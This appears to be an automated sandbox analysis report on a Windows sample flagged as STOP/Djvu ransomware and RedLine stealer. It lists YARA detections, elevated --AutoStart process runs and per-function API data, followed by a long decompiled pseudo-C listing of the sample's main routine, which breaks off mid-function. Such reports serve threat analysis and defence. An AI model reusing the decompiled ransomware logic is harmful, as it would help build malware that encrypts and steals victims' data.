Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000000.441862325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000000.441862325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000000.441862325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000000.441862325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000000.439811041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bE5aaTiJM0.exePID: 3304, Parent PID: 3688

General

Target ID:	14
Start time:	11:22:44
Start date:	05/08/2022
Path:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
Imagebase:	0x400000
File size:	747520 bytes
MD5 hash:	5FAE11A9DDB49452B6896FD3217E9665
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.445958712.00000000041A4000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bE5aaTiJM0.exePID: 2888, Parent PID: 3304

General

Target ID:	16
Start time:	11:22:49
Start date:	05/08/2022
Path:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
Imagebase:	0x400000
File size:	747520 bytes
MD5 hash:	5FAE11A9DDB49452B6896FD3217E9665
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000000.440338861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: bE5aaTiJM0.exePID: 4004, Parent PID: 3120COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	66.7%
Signature Coverage:	55.6%
Total number of Nodes:	18
Total number of Limit Nodes:	1

Executed Functions

Function 041D07C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 041D07EE
Module32First.KERNEL32(00000000,00000224), ref: 041D080E

Memory Dump Source

Source File: 00000000.00000002.378159844.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: e5840d231d125eeef6f5c76cca4c7e65896d014f3f551cae20118bce417687c3
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: C1F062716007156BD7203BB5A8CDAAF7AE8AF4D729F100668E643950C0DB70F8458A61

Uniqueness

Uniqueness Score: -1.00%

Function 041D0485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 041D04D6

Memory Dump Source

Source File: 00000000.00000002.378159844.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: c8e0495c9ff6c24fb8ab1103123085bbca9e7587ab0f01179826232d740ef6be
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 66112B79A00208EFDB01DF98C985E99BFF5AF08350F058094F9489B361D371EA90DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 041D171C Relevance: .1, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.378159844.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction ID: 2ab5d353bc644efc4e315ab927be19a350d96c4127aa5a6920fa60c0ba30f13d
Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction Fuzzy Hash: D63169B580A245EFCB15CE70D8D0AF5BB71EF87324F1989ECD4858B112D3356046C794

Uniqueness

Uniqueness Score: -1.00%

Function 041D00A3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.378159844.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 06cd15964a83e9d95e990096e84b54c6c4e59af4ef0fefe2af569bb0b4dc197d
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: DD1130B2340101AFD754DE55DCC1FA677EAEB8D268B1980A5ED08CB316E775E842C760

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: bE5aaTiJM0.exePID: 5720, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	42.6%
Total number of Nodes:	702
Total number of Limit Nodes:	16

Executed Functions

Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00419F90(void* __ebx, void* __edi, intOrPtr _a4, int _a8, int _a12, int _a16, signed int _a20, WCHAR** _a24, void* _a28, signed int _a32, intOrPtr _a36, long _a40, int _a44, int _a52, int _a56, intOrPtr _a72, intOrPtr _a80, char _a84, WCHAR* _a88, char _a96, intOrPtr _a100, struct tagMSG _a104, int _a108, char _a116, WCHAR* _a124, char _a128, char _a132, int _a144, int _a148, char _a156, char _a160, int _a176, int _a180, char _a196, char _a200, char _a204, int _a216, int _a220, char _a228, char _a232, int _a244, int _a248, char _a252, char _a260, char _a264, struct tagMSG _a272, struct tagMSG _a276, int _a280, int _a284, intOrPtr _a288, int _a292, char _a300, char _a304, char _a320, int _a336, int _a340, char _a380, short _a388, struct _SHELLEXECUTEINFOW _a396, int _a400, WCHAR* _a408, char* _a412, WCHAR* _a416, intOrPtr _a420, intOrPtr _a424, void* _a892, char _a896, short _a968, char _a984, char _a3248, short _a3252) {
				intOrPtr _v0;
				int _v4;
				long _v8;
				WCHAR** _v12;
				short* _v16;
				int _v20;
				CHAR* _v24;
				int _v28;
				int _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				void* __esi;
				void* _t525;
				void* _t526;
				void* _t528;
				int _t530;
				void* _t534;
				void* _t535;
				void* _t536;
				void* _t556;
				int _t557;
				WCHAR** _t566;
				void* _t570;
				void* _t573;
				int _t581;
				void* _t585;
				void* _t588;
				intOrPtr* _t590;
				int _t592;
				void* _t594;
				CHAR* _t596;
				void* _t599;
				void* _t602;
				void* _t608;
				void* _t614;
				int* _t618;
				short* _t677;
				void* _t697;
				void* _t707;
				void* _t723;
				void* _t727;
				long _t728;
				long _t729;
				void* _t730;
				void* _t746;
				long _t747;
				void* _t751;
				void* _t754;
				long _t755;
				void* _t759;
				void* _t765;
				signed int _t770;
				void* _t773;
				void* _t780;
				void* _t782;
				void* _t784;
				void* _t788;
				signed int _t789;
				void* _t790;
				void* _t799;
				void* _t800;
				void* _t817;
				void* _t828;
				void* _t839;
				short* _t846;
				void* _t856;
				void* _t859;
				char* _t861;
				void* _t865;
				long _t868;
				intOrPtr* _t879;
				void* _t881;
				void* _t895;
				void* _t896;
				void* _t897;
				void* _t898;
				void* _t899;
				void* _t901;
				void* _t903;
				long _t916;
				signed int _t917;
				void* _t919;
				WCHAR** _t923;
				WCHAR** _t949;
				WCHAR* _t950;
				void* _t952;
				int* _t955;
				int* _t958;
				int* _t960;
				intOrPtr _t962;
				int _t966;
				WCHAR** _t968;
				void* _t969;
				void* _t974;
				intOrPtr* _t982;
				void* _t983;
				intOrPtr* _t986;
				void* _t987;
				WCHAR* _t989;
				signed int _t990;
				signed int _t991;
				WCHAR* _t995;
				signed int _t996;
				signed int _t997;
				WCHAR* _t1000;
				signed int _t1001;
				signed int _t1002;
				intOrPtr* _t1005;
				void* _t1006;
				char* _t1008;
				intOrPtr* _t1011;
				void* _t1012;
				char* _t1014;
				intOrPtr* _t1017;
				void* _t1018;
				char* _t1020;
				intOrPtr* _t1136;
				void* _t1137;
				short* _t1142;
				void* _t1145;
				intOrPtr _t1159;
				intOrPtr _t1161;
				intOrPtr* _t1164;
				intOrPtr* _t1167;
				short* _t1168;
				short* _t1171;
				short* _t1173;
				intOrPtr* _t1175;
				intOrPtr* _t1178;
				intOrPtr* _t1181;
				intOrPtr* _t1191;
				int _t1197;
				int _t1198;
				WCHAR* _t1199;
				short* _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1204;
				short* _t1205;
				signed int _t1206;
				int* _t1207;
				signed int _t1208;
				int* _t1209;
				signed int _t1210;
				int* _t1211;
				intOrPtr* _t1212;
				unsigned int _t1215;
				signed int _t1217;
				void* _t1220;
				int* _t1226;
				void* _t1227;
				int _t1230;
				short* _t1231;
				int _t1232;
				int _t1233;
				int _t1234;
				int _t1235;
				char _t1236;
				int _t1242;
				signed int _t1244;
				short* _t1245;
				long _t1248;
				void* _t1249;
				signed int _t1263;
				signed int _t1264;
				void* _t1266;
				void* _t1268;
				void* _t1269;
				short* _t1270;
				void* _t1271;
				short* _t1272;
				void* _t1273;
				void* _t1274;
				char* _t1275;
				void* _t1276;
				void* _t1277;
				char* _t1278;
				void* _t1279;
				void* _t1280;
				char* _t1281;
				void* _t1282;
				void* _t1283;
				void* _t1284;
				void* _t1285;
				void* _t1286;
				void* _t1290;
				void* _t1292;
				short* _t1294;

				_t1264 = _t1263 & 0xfffffff8;
				E0042F7C0(0x14c4);
				_push(__ebx);
				_push(__edi);
				 *0x513244 = _a4; // executed
				_t525 = E0040CF10(); // executed
				if(_t525 == 0) {
					_t526 = GetCurrentProcess();
					GetLastError();
					_t528 = SetPriorityClass(_t526, 0x80); // executed
					__eflags = _t528;
					if(__eflags == 0) {
						GetLastError();
					}
					_t1226 =  *0x529228; // 0x6dcce8
					_a52 = 0;
					_a56 = 0;
					_t530 = E0041D3C0(__eflags, _t1226, _t1226[1],  &_a52);
					_t1159 =  *0x52922c; // 0x0
					_t974 = 0xffffffe - _t1159;
					_t1197 = _t530;
					__eflags = _t974 - 1;
					if(__eflags < 0) {
						_push("list<T> too long");
						E0044F23E(__eflags);
						goto L213;
					} else {
						 *0x52922c = _t1159 + 1;
						_t1226[1] = _t1197;
						 *( *(_t1197 + 4)) = _t1197;
						_t556 = E00419D10( &_a984);
						_t1226 =  *0x513268;
						_t557 = E0041D340(__eflags, _t1226, _t1226[1], _t556);
						_t1161 =  *0x51326c;
						_t974 = 0x1cb189 - _t1161;
						_t1198 = _t557;
						__eflags = _t974 - 1;
						if(__eflags < 0) {
							L213:
							_push("list<T> too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t1226);
							_t1227 = _t974;
							__eflags =  *(_t1227 + 0x8dc) - 0x10;
							if( *(_t1227 + 0x8dc) >= 0x10) {
								L00422587( *((intOrPtr*)(_t1227 + 0x8c8)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x8dc) = 0xf;
							 *(_t1227 + 0x8d8) = 0;
							 *((char*)(_t1227 + 0x8c8)) = 0;
							__eflags =  *(_t1227 + 0x8b8) - 8;
							if( *(_t1227 + 0x8b8) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x8a4)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x8b8) = 7;
							 *(_t1227 + 0x8b4) = 0;
							 *((short*)(_t1227 + 0x8a4)) = 0;
							_t534 =  *(_t1227 + 0x898);
							__eflags = _t534;
							if(_t534 != 0) {
								E00414F10(_t534,  *(_t1227 + 0x89c));
								L00422587( *(_t1227 + 0x898));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x898) = 0;
								 *(_t1227 + 0x89c) = 0;
								 *(_t1227 + 0x8a0) = 0;
							}
							_t535 =  *(_t1227 + 0x88c);
							__eflags = _t535;
							if(_t535 != 0) {
								E00414F10(_t535,  *(_t1227 + 0x890));
								L00422587( *(_t1227 + 0x88c));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x88c) = 0;
								 *(_t1227 + 0x890) = 0;
								 *(_t1227 + 0x894) = 0;
							}
							_t536 =  *(_t1227 + 0x880);
							__eflags = _t536;
							if(_t536 != 0) {
								E00414F10(_t536,  *(_t1227 + 0x884));
								L00422587( *(_t1227 + 0x880));
								_t1264 = _t1264 + 4;
								 *(_t1227 + 0x880) = 0;
								 *(_t1227 + 0x884) = 0;
								 *(_t1227 + 0x888) = 0;
							}
							__eflags =  *(_t1227 + 0x87c) - 8;
							if( *(_t1227 + 0x87c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x868)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x87c) = 7;
							 *(_t1227 + 0x878) = 0;
							 *((short*)(_t1227 + 0x868)) = 0;
							__eflags =  *(_t1227 + 0x864) - 8;
							if( *(_t1227 + 0x864) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x850)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x864) = 7;
							 *(_t1227 + 0x860) = 0;
							 *((short*)(_t1227 + 0x850)) = 0;
							__eflags =  *(_t1227 + 0x84c) - 8;
							if( *(_t1227 + 0x84c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x838)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x84c) = 7;
							 *(_t1227 + 0x848) = 0;
							 *((short*)(_t1227 + 0x838)) = 0;
							__eflags =  *(_t1227 + 0x834) - 8;
							if( *(_t1227 + 0x834) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 0x820)));
								_t1264 = _t1264 + 4;
							}
							 *(_t1227 + 0x834) = 7;
							 *(_t1227 + 0x830) = 0;
							 *((short*)(_t1227 + 0x820)) = 0;
							__eflags =  *(_t1227 + 0x1c) - 8;
							if( *(_t1227 + 0x1c) >= 8) {
								L00422587( *((intOrPtr*)(_t1227 + 8)));
							}
							 *(_t1227 + 0x1c) = 7;
							__eflags = 0;
							 *(_t1227 + 0x18) = 0;
							 *((short*)(_t1227 + 8)) = 0;
							return 0;
						} else {
							 *0x51326c = _t1161 + 1;
							_t1226[1] = _t1198;
							 *( *(_t1198 + 4)) = _t1198;
							L214();
							_a32 = 0;
							_a44 = 0;
							_t1230 =  *( *0x513268);
							_v4 = _t1230;
							_a52 = _t1230;
							E00413A90(0,  &_a128, _t1198, 0x400);
							_t1199 = _a124;
							GetModuleFileNameW(0, _t1199, 0x400);
							PathRemoveFileSpecW(_t1199);
							_push(_a72);
							_a180 = 7;
							_a176 = 0;
							_a160 = 0;
							E00418400( &_a160, _t1199, _a128);
							_t1200 = _t1230 + 0x10;
							__eflags = _t1200 -  &_a148;
							if(_t1200 !=  &_a148) {
								__eflags =  *(_t1200 + 0x14) - 8;
								if( *(_t1200 + 0x14) >= 8) {
									L00422587( *_t1200);
									_t1264 = _t1264 + 4;
								}
								__eflags = 0;
								 *(_t1200 + 0x14) = 7;
								 *(_t1200 + 0x10) = 0;
								 *_t1200 = 0;
								E004145A0(_t1200,  &_a160);
							}
							__eflags = _a180 - 8;
							if(_a180 >= 8) {
								L00422587(_a160);
								_t1264 = _t1264 + 4;
							}
							_a44 = 0;
							_t566 = CommandLineToArgvW(GetCommandLineW(),  &_a44);
							_a28 = _t566;
							lstrcpyW( &_a3252,  *_t566);
							_t1201 = 1;
							__eflags = _a36 - 1;
							if(_a36 <= 1) {
								L26:
								GlobalFree(_a28);
								__eflags =  *0x513235;
								if( *0x513235 == 0) {
									_t570 = E00412220(); // executed
									__eflags = _t570 - 1;
								} else {
									__eflags = E00412220() - 2;
								}
								if(__eflags <= 0) {
									E0040EF50(0x50fec0,  &_v12, __eflags, 0xa);
									_t949 = _v12;
									_t1266 = _t1264 + 4;
									_a148 = 0xf;
									_t1202 = 0;
									__eflags = 0;
									_a144 = 0;
									_a128 = 0;
									do {
										_t1164 =  *((intOrPtr*)(_t949 + _t1202 * 4));
										__eflags =  *_t1164;
										if( *_t1164 != 0) {
											_t982 = _t1164;
											_v12 = _t982 + 1;
											do {
												_t573 =  *_t982;
												_t982 = _t982 + 1;
												__eflags = _t573;
											} while (_t573 != 0);
											_t983 = _t982 - _v12;
											__eflags = _t983;
										} else {
											_t983 = 0;
										}
										_push(_t983);
										E00413EA0(_t949,  &_a128, _t1202, _t1230, _t1164);
										_t1202 = _t1202 + 1;
										__eflags = _t1202 - 0xa;
									} while (_t1202 < 0xa);
									__eflags = _a144 - 0x10;
									_t576 =  >=  ? _a124 :  &_a124;
									_push( >=  ? _a124 :  &_a124);
									 *(_t1230 + 0x8cc) = E00423C24();
									_a220 = 7;
									_a200 = 0;
									_a288 = 0;
									_a272.hwnd = 0;
									_a216 = 0;
									_a292 = 7;
									E00411CD0(_t949,  &_a272,  &_a200); // executed
									_t581 = _a16;
									_t1268 = _t1266 + 8;
									_t950 = _a28;
									__eflags = _t581;
									if(_t581 != 0) {
										L59:
										 *(_t1230 + 0x8cc) = 0;
									} else {
										__eflags = _t950;
										if(_t950 != 0) {
											goto L59;
										} else {
											_a12 = 7;
											_push(0xffffffff);
											_v8 = 0;
											_a8 = 0;
											E00414690(_t950,  &_v8,  &_a200, 0);
											_t1294 = _t1268 - 0x18;
											_t1142 = _t1294;
											_push(0xffffffff);
											 *(_t1142 + 0x14) = 7;
											 *(_t1142 + 0x10) = 0;
											 *_t1142 = 0;
											E00414690(_t950, _t1142,  &_v20, 0);
											E0040D240( *(_t1230 + 0x8cc)); // executed
											_t1268 = _t1294 + 0x18;
											__eflags = _v12 - 8;
											if(_v12 >= 8) {
												L00422587(_v16);
												_t1268 = _t1268 + 4;
											}
											_t581 = _a8;
										}
									}
									__eflags =  *0x513235;
									if( *0x513235 != 0) {
										L60:
										E00411A10();
										goto L61;
									} else {
										__eflags = _t581;
										if(_t581 != 0) {
											L62:
											__eflags =  *0x513234;
											if(__eflags != 0) {
												goto L81;
											} else {
												__eflags = _t581;
												if(__eflags == 0) {
													__eflags = _t950;
													if(__eflags == 0) {
														E0040EF50(0x50ffe0,  &_v16, __eflags, 0x10);
														_t1245 = _v16;
														_t1268 = _t1268 + 4;
														_a108 = 0xf;
														_t1217 = 0;
														__eflags = 0;
														_a104.hwnd = 0;
														_a88 = _t950;
														do {
															_t1191 =  *((intOrPtr*)(_t1245 + _t1217 * 4));
															__eflags =  *_t1191;
															if( *_t1191 != 0) {
																_t1136 = _t1191;
																_t950 = _t1136 + 1;
																do {
																	_t859 =  *_t1136;
																	_t1136 = _t1136 + 1;
																	__eflags = _t859;
																} while (_t859 != 0);
																_t1137 = _t1136 - _t950;
																__eflags = _t1137;
															} else {
																_t1137 = 0;
															}
															_push(_t1137);
															E00413EA0(_t950,  &_a88, _t1217, _t1245, _t1191);
															_t1217 = _t1217 + 1;
															__eflags = _t1217 - 0x10;
														} while (_t1217 < 0x10);
														_t861 =  &_a84;
														_t1140 =  &(_v24[0x8d0]);
														__eflags =  &(_v24[0x8d0]) - _t861;
														if( &(_v24[0x8d0]) != _t861) {
															_push(0xffffffff);
															E00413FF0(_t950, _t1140, _t861, 0);
														}
														_t865 = CreateThread(0, 0x61a8000, E0041DBD0, ( *0x513268)[1] + 8, 0, 0x513258);
														__eflags = _a100 - 0x10;
														 *0x513254 = _t865;
														if(__eflags >= 0) {
